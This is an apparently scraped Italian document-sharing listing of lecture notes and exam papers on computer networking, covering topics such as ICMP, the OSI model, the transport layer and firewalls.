Guida di Pro PC Secure 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) INFORMAZIONI AGGIUNTIVE 1) SOMMARIO Guida di Pro PC Secure Pro PC Secure è un programma che si occupa della protezione dagli attacchi provenienti

Dettagli

ICMP OSI. Internet Protocol Suite. Telnet FTP SMTP SNMP TCP e UDP NFS. Application XDR. Presentation. Session RPC. Transport.

ICMP OSI. Internet Protocol Suite. Telnet FTP SMTP SNMP TCP e UDP NFS. Application XDR. Presentation. Session RPC. Transport. ICMP Application Presentation Session Transport Telnet FTP SMTP SNMP TCP e UDP NFS XDR RPC Network Data Link Physical OSI ICMP ARP e RARP IP Non Specificati Protocolli di routing Internet Protocol Suite

Dettagli

Le reti di calcolatori

Le reti di calcolatori Le reti di calcolatori 1 La storia Computer grandi e costosi Gli utenti potevano accerdervi tramite telescriventi per i telex o i telegrammi usando le normali linee telefoniche Successivamente le macchine

Dettagli

Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative

Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Obiettivo: realizzazione di reti sicure Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Per quanto riguarda le scelte tecnologiche vi sono due categorie di tecniche: a) modifica

Dettagli

Corsi di Reti di Calcolatori (Docente Luca Becchetti)

Corsi di Reti di Calcolatori (Docente Luca Becchetti) Corsi di Reti di Calcolatori (Docente Luca Becchetti) NOT : le soluzioni proposte sono volutamente sintetiche. Lo studente dovrebbe fare uno sforzo per risolvere i quesiti in modo autonomo, espandendo

Dettagli

4 - Il livello di trasporto

4 - Il livello di trasporto Università di Bergamo Dipartimento di Ingegneria Gestionale e dell Informazione 4 - Il livello di trasporto Architetture e Protocolli per Internet Servizio di trasporto il livello di trasporto ha il compito

Dettagli

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Prova completa Martedì 15 Novembre 2005

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Prova completa Martedì 15 Novembre 2005 Prova di Esame - Rete Internet (ing. Giovanni Neglia) Prova completa Martedì 15 Novembre 2005 Si svolga il compito su questi fogli. Nel caso di domande a risposta aperta, lo spazio lasciato sul foglio

Dettagli

Protocollo ICMP, comandi ping e traceroute

Protocollo ICMP, comandi ping e traceroute Protocollo ICMP, comandi ping e traceroute Internet Control Message Protocol Internet Control Message Protocol (ICMP): usato dagli host, router e gateway per comunicare informazioni riguardanti il livello

Dettagli

Informatica per la comunicazione" - lezione 8 -

Informatica per la comunicazione - lezione 8 - Informatica per la comunicazione - lezione 8 - I multipli 1 KB (kilo) = 1000 B 1 MB (mega) = 1 mln B 1 GB (giga) = 1 mld B 1 TB (tera) = 1000 mld B Codifica binaria dei numeri Numerazione con base 10:

Dettagli

2.1 Configurare il Firewall di Windows

2.1 Configurare il Firewall di Windows .1 Configurare il Firewall di Windows LIBRERIA WEB Due o più computer possono scambiare dati, informazioni o servizi di tipo diverso utilizzando una connessione. Quindi, spesso, ad una connessione fisica

Dettagli

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall

Dettagli

Il funzionamento delle reti

Il funzionamento delle reti Il funzionamento delle reti La rete ci cambia la vita L Età dell Informazione ha prodotto profondi cambiamenti nessun luogo è remoto le persone sono interconnesse le relazioni sociali stanno mutando l

Dettagli